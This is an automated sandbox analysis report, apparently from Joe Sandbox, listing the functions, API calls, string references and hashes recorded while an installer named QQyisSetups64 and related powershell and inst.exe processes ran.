Instruction Fuzzy Hash: 77F06D7C400350AFC71CEFB0C94980F7BA9AF842507388468E90A8F312DB35D826CBE8

Function 03609E1F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03609E90
_free.LIBCMT ref: 03609EC2

Strings

&, xrefs: 03609F38

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: _free_malloc
String ID: &
API String ID: 845055658-3042966939
Opcode ID: 96f475fef29d70f25b531db5fbbeac76c6573e20d4e1e8de80fbd7a54519110d
Instruction ID: 286067001bbd6c0abe9d4741c1f7d5c7f1c3b0a4f9b70e3fae3d6324f710250a
Opcode Fuzzy Hash: 96f475fef29d70f25b531db5fbbeac76c6573e20d4e1e8de80fbd7a54519110d
Instruction Fuzzy Hash: FB516275D00219AFDB08DFE4C9859EFB7F9AF48300F148159E905AB3A1D734AD05CBA4

Function 0360C2CF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

_wcsrchr.LIBCMT ref: 0360C386
_memset.LIBCMT ref: 0360C3C3

Strings

D, xrefs: 0360C3E2

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: _memset_wcsrchr
String ID: D
API String ID: 1675014779-2746444292
Opcode ID: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
Instruction ID: 12ff95f005a1066df4fe866e5970116c77f139b9c384dcc14adb3d28297db8fd
Opcode Fuzzy Hash: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
Instruction Fuzzy Hash: 063106729402187BE724D7E49C8AFFF776CEB14710F140229FA0AAE1C0DA71A916C6E5

Function 0378B19D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0378BC70: GetDesktopWindow.USER32 ref: 0378BC8F
Part of subcall function 0378BC70: GetDC.USER32(00000000), ref: 0378BC9C
Part of subcall function 0378BC70: CreateCompatibleDC.GDI32(00000000), ref: 0378BCA2
Part of subcall function 0378BC70: GetDC.USER32(00000000), ref: 0378BCAD
Part of subcall function 0378BC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 0378BCBA
Part of subcall function 0378BC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 0378BCC2
Part of subcall function 0378BC70: ReleaseDC.USER32(00000000,00000000), ref: 0378BCD3
Part of subcall function 0378BC70: GetSystemMetrics.USER32(0000004C), ref: 0378BD78
Part of subcall function 0378BC70: GetSystemMetrics.USER32(0000004D), ref: 0378BD8D
Part of subcall function 0378BC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0378BDA6
Part of subcall function 0378BC70: SelectObject.GDI32(?,00000000), ref: 0378BDB4
Part of subcall function 0378BC70: SetStretchBltMode.GDI32(?,00000003), ref: 0378BDC0
Part of subcall function 0378BC70: GetSystemMetrics.USER32(0000004F), ref: 0378BDCD
Part of subcall function 0378BC70: GetSystemMetrics.USER32(0000004E), ref: 0378BDE0

Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721

_memset.LIBCMT ref: 0378B1E1
swprintf.LIBCMT ref: 0378B204

Strings

%s %s, xrefs: 0378B1F3

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
String ID: %s %s
API String ID: 1028806752-581060391
Opcode ID: b863bea2e5efeade8d2f67afee7927c84bd6b1159235585929ed244e982f47b8
Instruction ID: 29affa5b20a16e468d070317d64b8cc929562d8aabfc98b33166c5b867043aac
Opcode Fuzzy Hash: b863bea2e5efeade8d2f67afee7927c84bd6b1159235585929ed244e982f47b8
Instruction Fuzzy Hash: F721D3B6A44340ABD210FF19EC85E6FB7E8EFD9710F08062EF4895A201E7619914C7A3

Function 03789100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03789115

Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF4E
Part of subcall function 0378EF39: __CxxThrowException@8.LIBCMT ref: 0378EF63
Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF74

std::_Xinvalid_argument.LIBCPMT ref: 03789128

Strings

string too long, xrefs: 03789110, 03789123

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: 3796e7307d16dc5702b49abc8b26dcfc8d6a0976186a2fb0c48d1bac1c528624
Instruction ID: a2e3a13da5d397920c8bf00b6229536b03bb690195478382789d93b72108f60f
Opcode Fuzzy Hash: 3796e7307d16dc5702b49abc8b26dcfc8d6a0976186a2fb0c48d1bac1c528624
Instruction Fuzzy Hash: 9311C875788740DBC321DF2CE804A2AB7E9ABD7621F140A6EE2D1CB742C771D804C7A4

Function 037893F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0378941D
std::_Xinvalid_argument.LIBCPMT ref: 0378944A

Strings

invalid string position, xrefs: 03789445

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position
API String ID: 3614006799-1799206989
Opcode ID: 69abdce99967b7c6dece9bb8c105e8ab68e9c69c5c58a93ae55306b7bd72b2a1
Instruction ID: da00d526fda226278a9cbabfddbb1d56e9d4d42a05b93ff05285e5f2ccd5f380
Opcode Fuzzy Hash: 69abdce99967b7c6dece9bb8c105e8ab68e9c69c5c58a93ae55306b7bd72b2a1
Instruction Fuzzy Hash: DF014E336403106BD724FF6CD8847AAF395AF42620F150A2DE6569F9C1D771E940C3D1

Function 02886FA1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

__output_l.LIBCMT ref: 02886FFC

Part of subcall function 028870E4: __getptd_noexit.LIBCMT ref: 028870E4

Strings

B, xrefs: 02886FF5

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: __getptd_noexit__output_l
String ID: B
API String ID: 2141734944-1255198513
Opcode ID: 4ea230d637fa5764a43ecdf8be00f7d262e1573a93248e79ca2350081dd71a3f
Instruction ID: 3cf38d7283005a941b4309dead69d7fdaa71fb35e15c03ac5dd3304fdab03949
Opcode Fuzzy Hash: 4ea230d637fa5764a43ecdf8be00f7d262e1573a93248e79ca2350081dd71a3f
Instruction Fuzzy Hash: 4101877A90425D9BEF00AFA8CC00BEEBBB9FB04364F100165E924E6281E7749500CBB2

Function 0378F7BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

__output_l.LIBCMT ref: 0378F815

Part of subcall function 0378F91B: __getptd_noexit.LIBCMT ref: 0378F91B

Strings

B, xrefs: 0378F80E

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: __getptd_noexit__output_l
String ID: B
API String ID: 2141734944-1255198513
Opcode ID: 5bc75878e19a99f8b3291bc09011d637415e77d2edc72ea821797cd9c84227ee
Instruction ID: 14a6806214fe6cd9fc35656f661450f65cf9baf9e608938c9a95e93e9d797d07
Opcode Fuzzy Hash: 5bc75878e19a99f8b3291bc09011d637415e77d2edc72ea821797cd9c84227ee
Instruction Fuzzy Hash: 8001617590024DAFEF00EFA5EC05BEEBBB8EB04364F144516E924EA290D7749501DB65

Function 02C86FCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

__output_l.LIBCMT ref: 02C87025

Part of subcall function 02C8710D: __getptd_noexit.LIBCMT ref: 02C8710D

Strings

B, xrefs: 02C8701E

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: __getptd_noexit__output_l
String ID: B
API String ID: 2141734944-1255198513
Opcode ID: fd1fdc686e426d0524c4a0ace4d10a2df1a110a2837cd7d0ca9d2c171b75a8c9
Instruction ID: 47e3953bf014acce93abe9a8c1e1d0ad48c387f0c91935b862ae2fa55050790d
Opcode Fuzzy Hash: fd1fdc686e426d0524c4a0ace4d10a2df1a110a2837cd7d0ca9d2c171b75a8c9
Instruction Fuzzy Hash: 7F01847290424D9BDF00AFA4CC01BEEBBB9FB44368F108115E924B6280E775D505DFA5

Function 0360F179 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

__output_l.LIBCMT ref: 0360F1D4

Part of subcall function 0360F2DA: __getptd_noexit.LIBCMT ref: 0360F2DA

Strings

B, xrefs: 0360F1CD

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: __getptd_noexit__output_l
String ID: B
API String ID: 2141734944-1255198513
Opcode ID: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
Instruction ID: b863c486642f62599d94180ca6dff757b8a1874649b41dc346d0e79c008d6bba
Opcode Fuzzy Hash: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
Instruction Fuzzy Hash: B4016D75E042199BDF20DFA4CC01AEEBBB8EB45364F144159E924AA2C0E7789511CBA5

Function 03789570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0378957F

Part of subcall function 0378EF86: std::exception::exception.LIBCMT ref: 0378EF9B
Part of subcall function 0378EF86: __CxxThrowException@8.LIBCMT ref: 0378EFB0
Part of subcall function 0378EF86: std::exception::exception.LIBCMT ref: 0378EFC1

_memmove.LIBCMT ref: 037895B5

Strings

invalid string position, xrefs: 0378957A

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 291cde847a2166e875e23dd31fb394608da02a7e970727b07259e01edf8f9f49
Instruction ID: dbdcb94cb6c3eec9224ed07bd94bc763614cc72a44d9dddd2914beff3a542f86
Opcode Fuzzy Hash: 291cde847a2166e875e23dd31fb394608da02a7e970727b07259e01edf8f9f49
Instruction Fuzzy Hash: A7018F317817018FD325EB2CEC9862AB3E69BC65007280A2CE291CBB8AD7B1DC424794

Function 0378D1C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0378D1D4

Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF4E
Part of subcall function 0378EF39: __CxxThrowException@8.LIBCMT ref: 0378EF63
Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF74

_memmove.LIBCMT ref: 0378D20D

Strings

vector<T> too long, xrefs: 0378D1CF

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 89fcfa803484e48a5fed5e3530a479c96febc63a66aed2151680a660fd51d5a5
Instruction ID: ae0246fa05a81610ee04475f5b48b6b87c1bd7c366ece0197d9a3bad4e5ca7ca
Opcode Fuzzy Hash: 89fcfa803484e48a5fed5e3530a479c96febc63a66aed2151680a660fd51d5a5
Instruction Fuzzy Hash: F701D876A402019FD714FF6DE8A9D2E77B8E6402527D9823AEC11C3648F7B8A814C790

Function 03788430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03788443

Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF4E
Part of subcall function 0378EF39: __CxxThrowException@8.LIBCMT ref: 0378EF63
Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF74

_memmove.LIBCMT ref: 0378846E

Strings

vector<T> too long, xrefs: 0378843E

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 485cfac19ba814542519c0cc62b5a253aa27867060197c97b30144b51bbf6b24
Instruction ID: a46db35149802004c74519c7599deaae97779fcd984d1366180f2e8063403a55
Opcode Fuzzy Hash: 485cfac19ba814542519c0cc62b5a253aa27867060197c97b30144b51bbf6b24
Instruction Fuzzy Hash: 3901A2B26443099FCB24EFA9DC9592BB3D8EB542107584A2DE45ACB740E731F800C761

Function 02893414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0289343E
__CallSettingFrame@12.LIBCMT ref: 0289348A

Strings

j, xrefs: 02893414

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: CallFrame@12Setting__getptd
String ID: j
API String ID: 3454690891-2137352139
Opcode ID: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
Instruction ID: 485dd21f4a90035941cd388f95717001b6757ca0dd6209e30ca5a99883d2a0f8
Opcode Fuzzy Hash: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
Instruction Fuzzy Hash: E5115B7D800259EBCF12EF58C5443ACBB71BF16718F1A8089E459AB682C3746991CFD2

Function 0361FD07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0361FD31
__CallSettingFrame@12.LIBCMT ref: 0361FD7D

Strings

j, xrefs: 0361FD07

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: CallFrame@12Setting__getptd
String ID: j
API String ID: 3454690891-2137352139
Opcode ID: 90659ebcae58fcf1a05544bb40a9ab719d54a7eef93821734f71d7871a8b8079
Instruction ID: b92d54330a793bc0ba35450893179b0451f578816bb19ae8a8d83c2be2b82958
Opcode Fuzzy Hash: 90659ebcae58fcf1a05544bb40a9ab719d54a7eef93821734f71d7871a8b8079
Instruction Fuzzy Hash: D3115735C00215DFDB10EF29C1447ACFBB1BB04314F1D8289D4A92F692C775AAA2CB95

Function 028937A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 028937AF

Part of subcall function 028898E6: __getptd_noexit.LIBCMT ref: 028898E9
Part of subcall function 028898E6: __amsg_exit.LIBCMT ref: 028898F6

__getptd.LIBCMT ref: 028937BD

Strings

csm, xrefs: 028937CB

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
Instruction ID: 26bc4e3dbb4807e6bac4a4ae70bc7ed7504fdca6f0de0bc01433375a5566944c
Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
Instruction Fuzzy Hash: 72016D3C900205DBCF35AFA9C4446ACB3B6BF04315F6C88ADE448E6250DB319580DF52

Function 037A06D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 037A010A: __getptd.LIBCMT ref: 037A0110
Part of subcall function 037A010A: __getptd.LIBCMT ref: 037A0120

__getptd.LIBCMT ref: 037A06E3

Part of subcall function 03793E5B: __getptd_noexit.LIBCMT ref: 03793E5E
Part of subcall function 03793E5B: __amsg_exit.LIBCMT ref: 03793E6B

__getptd.LIBCMT ref: 037A06F1

Strings

csm, xrefs: 037A06FF

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
Instruction ID: d10dfff43bb684d99e9bc54f1dec9134aff526f88f380d5e82efc43b72822041
Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
Instruction Fuzzy Hash: 92014638800B05CFDF35DF69D4886ADB7B9BF84212F688E6ED0599A290DB329581CF41

Function 02C937C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02C932AE: __getptd.LIBCMT ref: 02C932B4
Part of subcall function 02C932AE: __getptd.LIBCMT ref: 02C932C4

__getptd.LIBCMT ref: 02C937D8

Part of subcall function 02C8990F: __getptd_noexit.LIBCMT ref: 02C89912
Part of subcall function 02C8990F: __amsg_exit.LIBCMT ref: 02C8991F

__getptd.LIBCMT ref: 02C937E6

Strings

csm, xrefs: 02C937F4

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
Instruction ID: 37bc19d1e7cb43f39d98e78830ff747704ce66c7d499803f4ce4dca171da32ec
Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
Instruction Fuzzy Hash: CB016D36801285DBCF34AF66C4486ACB3B6AF40215F5444AED4909BFA0CB35A781DF15

Function 03620093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 036200A2

Part of subcall function 0361381A: __getptd_noexit.LIBCMT ref: 0361381D
Part of subcall function 0361381A: __amsg_exit.LIBCMT ref: 0361382A

__getptd.LIBCMT ref: 036200B0

Strings

csm, xrefs: 036200BE

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
Instruction ID: 8934303b419f23c6b717fd539e396b683402a709ab8a2d28467331d4e5c1d6d0
Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
Instruction Fuzzy Hash: 81018F388047118EDF34DFA4C54466CBFB6AF04211F2D855ED4C19AB50CB3495A1CF00

Analysis Process: powershell.exePID: 8136, Parent PID: 8068COMMON

Executed Functions

Function 030C29F0 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1426666496.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_30c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38bbcc3562bf315115377dceb3d285beab08f3360c3cb54230f0f2ba918c955d
Instruction ID: b5e25e1d0c865d6ba58ffcfbfbcbd02315df61277596f55f0b065ada044b6c3b
Opcode Fuzzy Hash: 38bbcc3562bf315115377dceb3d285beab08f3360c3cb54230f0f2ba918c955d
Instruction Fuzzy Hash: 5C917E74A012458FCB15CF5CC494AAEFBB5FF48310B288699D815AB765C736FC91CBA0

Function 030C2B00 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1426666496.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_30c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e117922d67fbfc5a2452f0ba1b875b77c61e5e43d4c3fb86abea9e198a8df0
Instruction ID: cf97b993baf45e8ad8c88e325744740a454800d17296c247aa29b71e033d80a7
Opcode Fuzzy Hash: 05e117922d67fbfc5a2452f0ba1b875b77c61e5e43d4c3fb86abea9e198a8df0
Instruction Fuzzy Hash: 74415974A112498FCB19CF48C4D8AAEF7B5FF48310B2585A9D815AB764C736FC92CB90

Function 02E9D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1424194097.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2e9d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de228ca72e559444e1d905330d1a5447720294ef01080cb7c5450c2329362a44
Instruction ID: 3277b29637c67a3d4282c22624e6a1fcf570ba6ad068503cb783d9492f573060
Opcode Fuzzy Hash: de228ca72e559444e1d905330d1a5447720294ef01080cb7c5450c2329362a44
Instruction Fuzzy Hash: B901407104E3D09FD7128B258C94B52BFB4DF43228F19C1DBD8888F1A3C2695845C772

Function 02E9D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1424194097.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2e9d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a63f220690fd1a43978238283b7cf84110a49f42985289274baa4a032d721ebe
Instruction ID: eae081580e26c7afb30ecabbfa851ad9d8bf43159e00612c379090f9d56a41dd
Opcode Fuzzy Hash: a63f220690fd1a43978238283b7cf84110a49f42985289274baa4a032d721ebe
Instruction Fuzzy Hash: 8001F2314483649AEB206A21CC84BA7FF98DF41229F08C11BEC484B282C3799846CAB2

Analysis Process: powershell.exePID: 8180, Parent PID: 8076COMMON

Executed Functions

Function 0329D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1402595113.000000000329D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0329D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_329d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17cd181615e1e9706e76674620aaf18f8b7a09b613cf45e474c5a83c56afd061
Instruction ID: ed10eac1271d65c4494014c014abf1dc47ca49be8f857731542fc2c32f9a049a
Opcode Fuzzy Hash: 17cd181615e1e9706e76674620aaf18f8b7a09b613cf45e474c5a83c56afd061
Instruction Fuzzy Hash: 5B01F2315183049BFB208A25CC84B67FF9CDF41325F08C55BEC480B282C2799886DAB2

Function 0329D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1402595113.000000000329D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0329D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_329d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6acb2045707e38cf57362c45cc332fb51202e606013c11953018503ca5d3cf3
Instruction ID: 20a55a10f7626bf4737979ce99a006c1be59e27edf402c9d8aba741e81ffe9ee
Opcode Fuzzy Hash: d6acb2045707e38cf57362c45cc332fb51202e606013c11953018503ca5d3cf3
Instruction Fuzzy Hash: CE01407204E3C09FE7128B258C94B52BFB8DF43224F1D81DBD8888F1A3C2699849D772

Analysis Process: inst.exePID: 1464, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	90

Executed Functions

Function 00AC592D Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDriveTypeW.KERNEL32(?), ref: 00AC595E
_memset.LIBCMT ref: 00AC597C
GetDiskFreeSpaceExW.KERNEL32(?,00000000,00000000,?), ref: 00AC598E
__aulldiv.LIBCMT ref: 00AC59F4
__aulldiv.LIBCMT ref: 00AC5A3B
__aulldiv.LIBCMT ref: 00AC5A71

Strings

%d.%d GB, xrefs: 00AC5A8F
%d.%d KB, xrefs: 00AC5A09
%d GB, xrefs: 00AC5A7D
%d.%d MB, xrefs: 00AC5A50
%d KB, xrefs: 00AC5A00
%d MB, xrefs: 00AC5A47
c:\, xrefs: 00AC593D
%d Bytes, xrefs: 00AC59B7

Memory Dump Source

